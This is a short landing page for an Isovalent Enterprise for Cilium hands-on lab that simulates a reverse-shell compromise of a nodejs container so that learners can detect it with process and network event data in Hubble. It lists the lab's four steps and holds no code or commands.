Isovalent Enterprise for Cilium: Security Visibility
In this scenario, we are going to simulate the exploitation of a nodejs application, with the attacker spawning a reverse shell inside of a container and moving laterally within the Kubernetes environment.
We will demonstrate how the combined Process and Network Event Data:
- identify the suspicious Late Process Execution
- tie the suspicious processes to a randomly generated External Domain Name
- trace the Lateral Movement and Data Exfiltration of the attacker post-exploit
DifficultyIntermediate
VersionEnterprise
TopicsSecurity
Project
Main steps in the lab
01🚀 Deploying a demo app
Let's deploy the demo app!
02👓 Explore Process and Network Events
Now with our application deployed, how do we view events?
03🛰️ Viewing Processes in Hubble Enterprise
Let's go through a security use case!
04👨🏻💻 Observe security events as raw JSON
How do we see events as JSON?